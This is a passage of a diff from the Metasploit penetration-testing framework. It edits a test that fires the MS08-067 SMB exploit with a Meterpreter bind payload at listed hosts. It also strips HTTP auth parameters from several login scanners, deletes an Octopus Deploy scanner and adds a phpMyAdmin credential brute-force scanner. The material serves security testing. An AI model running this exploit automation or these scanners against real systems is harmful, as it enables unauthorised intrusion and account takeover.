-} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
-
-#endif
@@ -42,7 +42,6 @@ Feature: Help command
          route         Route traffic through a session
          save          Saves the active datastores
          search        Searches module names and descriptions
-          sess          Interact with a given session
          sessions      Dump session listings and display information about sessions
          set           Sets a context-specific variable to a value
          setg          Sets a global variable to a value
@@ -10,39 +10,18 @@ Feature: MS08-067 netapi
    Given I ready the windows targets
    Given a file named "ms08-067-bind.rc" with:
      """
-      <ruby>
-      self.run_single("spool #{Rails.root.join('tmp', 'console.log')}")
-      hosts           = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
-      payload_name    = 'windows/meterpreter/bind_tcp'
-      exploited_hosts = []
-      failed_hosts    = []
-
-      hosts.each do |host|
-        print_status("Trying MS08-067 against #{host['ipAddress']}")
-        mod = framework.exploits.create('windows/smb/ms08_067_netapi')
-        mod.datastore['PAYLOAD'] = payload_name
-        mod.datastore['RHOST'] = host['ipAddress']
-        m = mod.exploit_simple(
-          'LocalInput'  => nil,
-          'LocalOutput' => nil,
-          'Payload'     => payload_name,
-          'RunAsJob'    => false
-        )
-
-        sleep(1)
-
-        if m
-          exploited_hosts << host['ipAddress']
-        else
-          failed_hosts << host['ipAddress']
-        end
-      end
-
-      print_status("Exploited hosts: #{exploited_hosts.inspect}")
-      print_status("Failed hosts: #{failed_hosts.inspect}")
-      self.run_single('sessions -K')
-      </ruby>
+        <ruby>
+          hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
+          self.run_single('use exploit/windows/smb/ms08_067_netapi')
+          self.run_single('set payload windows/meterpreter/bind_tcp')
+          hosts.each do |host|
+            self.run_single("set RHOST #{host['ipAddress']}")
+            self.run_single('run -j')
+            sleep 1
+          end
+          self.run_single('sessions -K')
+        </ruby>
      """
-    When I successfully run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` for up to 100 seconds
+    When I run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit`
    Then the 'Mdm::Host' table contains the expected targets
    
@@ -4,11 +4,6 @@ Before do
  @aruba_timeout_seconds = 8.minutes
 end

-Before('@db') do |scenario|
-  dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
-  ActiveRecord::Base.establish_connection(dbconfig["test"])
-end
-
 # don't setup child processes to load simplecov_setup.rb if simplecov isn't installed
 # unless Bundler.settings.without.include?(:coverage)
 #   Before do |scenario|
@@ -17,7 +17,7 @@ module Metasploit
        # (see Base#attempt_login)
        def attempt_login(credential)
          http_client = Rex::Proto::Http::Client.new(
-            host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies, http_username, http_password
+            host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies
          )

          configure_http_client(http_client)
@@ -34,7 +34,7 @@ module Metasploit
            result_opts[:service_name] = 'http'
          end
          begin
-            cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, http_username, http_password)
+            cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version)
            configure_http_client(cli)
            cli.connect
            req = cli.request_cgi({
@@ -69,7 +69,7 @@ module Metasploit
        # @param (see Rex::Proto::Http::Resquest#request_raw)
        # @return [Rex::Proto::Http::Response] The HTTP response
        def send_request(opts)
-          cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => self}, ssl, ssl_version, proxies, http_username, http_password)
+          cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => self}, ssl, ssl_version, proxies)
          configure_http_client(cli)
          cli.connect
          req = cli.request_raw(opts)
@@ -35,9 +35,7 @@ module Metasploit
                                               },
                                               ssl,
                                               ssl_version,
-                                               proxies,
-                                               http_username,
-                                               http_password)
+                                               proxies)
            configure_http_client(cli)
            cli.connect

@@ -20,13 +20,6 @@ module Metasploit
        #   @return [String] Cookie session
        attr_accessor :jsession

-        # @!attribute http_username
-        attr_accessor :http_username
-        #   @return [String] HTTP username
-
-        # @!attribute http_password
-        attr_accessor :http_password
-
        # (see Base#check_setup)
        def check_setup
          begin
@@ -68,7 +61,7 @@ module Metasploit
        # @param (see Rex::Proto::Http::Resquest#request_raw)
        # @return [Rex::Proto::Http::Response] The HTTP response
        def send_request(opts)
-          cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies, http_username, http_password)
+          cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies)
          configure_http_client(cli)
          cli.connect
          req = cli.request_raw(opts)
@@ -161,14 +161,6 @@ module Metasploit
        #   @return [Boolean] Whether to conform to IIS digest authentication mode.
        attr_accessor :digest_auth_iis

-        # @!attribute http_username
-        # @return [String]
-        attr_accessor :http_username
-
-        # @!attribute http_password
-        # @return [String]
-        attr_accessor :http_password
-

        validates :uri, presence: true, length: { minimum: 1 }

@@ -179,7 +171,7 @@ module Metasploit
        # (see Base#check_setup)
        def check_setup
          http_client = Rex::Proto::Http::Client.new(
-            host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies, http_username, http_password
+            host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies
          )
          request = http_client.request_cgi(
            'uri' => uri,
@@ -221,8 +213,8 @@ module Metasploit
          cli_ssl         = opts['ssl'] || ssl
          cli_ssl_version = opts['ssl_version'] || ssl_version
          cli_proxies     = opts['proxies'] || proxies
-          username        = opts['credential'] ? opts['credential'].public : http_username
-          password        = opts['credential'] ? opts['credential'].private : http_password
+          username        = opts['credential'] ? opts['credential'].public : ''
+          password        = opts['credential'] ? opts['credential'].private : ''
          realm           = opts['credential'] ? opts['credential'].realm : nil
          context         = opts['context'] || { 'Msf' => framework, 'MsfExploit' => framework_module}

@@ -7,18 +7,10 @@ module Metasploit
      # IP Board login scanner
      class IPBoard < HTTP

-        # @!attribute http_username
-        # @return [String]
-        attr_accessor :http_username
-
-        # @!attribute http_password
-        # @return [String]
-        attr_accessor :http_password
-
        # (see Base#attempt_login)
        def attempt_login(credential)
          http_client = Rex::Proto::Http::Client.new(
-              host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies, self.http_username, self.http_password
+              host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies
          )
          configure_http_client(http_client)

@@ -37,7 +37,7 @@ module Metasploit
            result_opts[:service_name] = 'http'
          end
          begin
-            cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies, http_username, http_password)
+            cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies)
            configure_http_client(cli)
            cli.connect
            req = cli.request_cgi({
@@ -35,7 +35,7 @@ module Metasploit
          begin
            cred = Rex::Text.uri_encode(credential.private)
            body = "data%5BLogin%5D%5Bowner_name%5D=admin&data%5BLogin%5D%5Bowner_passwd%5D=#{cred}"
-            cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, http_username, http_password)
+            cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version)
            configure_http_client(cli)
            cli.connect
            req = cli.request_cgi(
@@ -1,64 +0,0 @@
-require 'metasploit/framework/login_scanner/http'
-require 'json'
-
-module Metasploit
-  module Framework
-    module LoginScanner
-
-      # Octopus Deploy login scanner
-      class OctopusDeploy < HTTP
-
-        # Inherit LIKELY_PORTS,LIKELY_SERVICE_NAMES, and REALM_KEY from HTTP
-        CAN_GET_SESSION = true
-        DEFAULT_PORT    = 80
-        PRIVATE_TYPES   = [ :password ]
-
-        # (see Base#set_sane_defaults)
-        def set_sane_defaults
-          uri = '/api/users/login' if uri.nil?
-          method = 'POST' if method.nil?
-
-          super
-        end
-
-        def attempt_login(credential)
-          result_opts = {
-            credential: credential,
-            host: host,
-            port: port,
-            protocol: 'tcp'
-          }
-          if ssl
-            result_opts[:service_name] = 'https'
-          else
-            result_opts[:service_name] = 'http'
-          end
-          begin
-            json_post_data = JSON.pretty_generate({ Username: credential.public, Password: credential.private })
-            cli = Rex::Proto::Http::Client.new(host, port, { 'Msf' => framework, 'MsfExploit' => framework_module }, ssl, ssl_version, http_username, http_password)
-            configure_http_client(cli)
-            cli.connect
-            req = cli.request_cgi(
-              'method' => 'POST',
-              'uri' => uri,
-              'ctype' => 'application/json',
-              'data' => json_post_data
-            )
-            res = cli.send_recv(req)
-            body = JSON.parse(res.body)
-            if res && res.code == 200 && body.key?('IsActive') && body['IsActive']
-              result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: res.body)
-            else
-              result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: res)
-            end
-          rescue ::JSON::ParserError
-            result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: res.body)
-          rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error
-            result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
-          end
-          Result.new(result_opts)
-        end
-      end
-    end
-  end
-end
@@ -0,0 +1,158 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      class PhpMyAdmin < HTTP
+        DEFAULT_PORT  = 4848
+        PRIVATE_TYPES = [ :password ]
+        LOGIN_STATUS = Metasploit::Model::Login::Status # shorter name
+
+        # @!attribute php_my_admin
+        #   @return [String] cookie pma à mettre dans la prochaine requete
+        attr_accessor :php_my_admin
+
+        # @!attribute token
+        #   @return [String] token requete
+        attr_accessor :token
+
+        # @!attribute pmaUser_1
+        #   @return [String] pmaUser-1 cookie a mettre dans la requete
+        attr_accessor :pmaUser_1
+
+        # @!attribute pmaPass_1
+        #   @return [String] pmaPass-1 cookie a mettre dans la requete
+        attr_accessor :pmaPass_1
+
+        # (see Base#check_setup)
+        def check_setup
+          begin
+            res = send_request({'uri' => uri})
+            return "Connection failed" if res.nil?
+            if !([200, 302].include?(res.code))
+              return "Unexpected HTTP response code #{res.code} (is this really phpMyAdmin ?)"
+            end
+
+          rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error
+            return "Unable to connect to target"
+          end
+
+          true
+        end
+
+        # Sends a HTTP request with Rex
+        #
+        # @param (see Rex::Proto::Http::Resquest#request_raw)
+        # @return [Rex::Proto::Http::Response] The HTTP response
+        def send_request(opts)
+          cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies)
+          configure_http_client(cli)
+          cli.connect
+          req = cli.request_raw(opts)
+          res = cli.send_recv(req)
+
+          # Found a cookie? Set it. We're going to need it.
+          if self.php_my_admin == '' && res && res.get_cookies =~ /(phpMyAdmin=[a-z0-9]+;)/i
+            self.php_my_admin = res.get_cookies.match(/ (phpMyAdmin=[a-z0-9]+;)/)[1]
+          end
+          if self.pmaPass_1 == '' && res && res.get_cookies =~ /(pmaPass-1=[a-zA-Z0-9%]+;)/i
+            self.pmaPass_1 = $1
+          end
+          if self.pmaUser_1 == '' && res && res.get_cookies =~ /(pmaUser-1=[a-zA-Z0-9%]+;)/i
+            self.pmaUser_1 = $1
+          end
+          if self.token == ''
+            tokens = res.body.match(/<input type="hidden" name="token" value="(\w+)"/)
+            self.token = (tokens.nil?) ? '' : tokens[-1]
+          end
+
+          res
+        end
+
+
+        # Sends a login request
+        #
+        # @param credential [Metasploit::Framework::Credential] The credential object
+        # @return [Rex::Proto::Http::Response] The HTTP auth response
+        def do_login(username, password)
+          # on recupere les cookies/token
+          send_request({'uri' => "#{uri}index.php"})
+
+          data  = "pma_username=#{username}&"
+          data << "pma_password=#{password}&"
+          data << "token=#{self.token}"
+
+          opts = {
+            'uri'     => "#{uri}index.php",
+            'method'  => 'POST',
+            'data'    => data,
+            'headers' => {
+              'Content-Type'   => 'application/x-www-form-urlencoded',
+              'Cookie'         => "#{self.pmaUser_1} #{self.php_my_admin}",
+            }
+          }
+
+          res = send_request(opts)
+          if is_logged_in
+            return {:status => LOGIN_STATUS::SUCCESSFUL, :proof => self.pmaPass_1}
+          end
+
+          return {:status => LOGIN_STATUS::INCORRECT, :proof => res.to_s}
+
+        end
+
+
+        def is_logged_in
+          url_verif = "#{uri}index.php?token=#{self.token}"
+
+          cookies = "#{self.pmaPass_1} #{self.pmaUser_1} #{self.php_my_admin}"
+
+          res = send_request({
+            'uri'    => url_verif,
+             'headers' => {
+               'Content-Type'   => 'application/x-www-form-urlencoded',
+               'Cookie'  => cookies
+             }
+          })
+
+          return (res.body.include? 'Log out')
+        end
+
+
+        # Attemps to login to the server.
+        #
+        # @param [Metasploit::Framework::Credential] credential The credential information.
+        # @return [Result] A Result object indicating success or failure
+        def attempt_login(credential)
+          # Default Result
+          result_opts = {
+            credential: credential,
+            status: Metasploit::Model::Login::Status::INCORRECT,
+            proof: nil,
+            host: host,
+            port: port,
+            protocol: 'tcp'
+          }
+
+          self.php_my_admin = ''
+          self.pmaUser_1 = ''
+          self.pmaPass_1 = ''
+          self.token = ''
+          # Merge login result
+          begin
+            result_opts.merge!(do_login(credential.public, credential.private))
+          rescue ::Rex::ConnectionError => e
+            # Something went wrong during login. 'e' knows what's up.
+            result_opts.merge!(status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: e.message)
+          end
+
+          # Return the Result object
+          return Result.new(result_opts)
+        end
+
+      end
+    end
+  end
+end
+
@@ -33,7 +33,7 @@ module Metasploit
          res = nil

          begin
-            cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies, http_username, http_password)
+            cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies)
            configure_http_client(cli)
            cli.connect
            req = cli.request_cgi(req_opts)
--- a/Show More
+++ b/Show More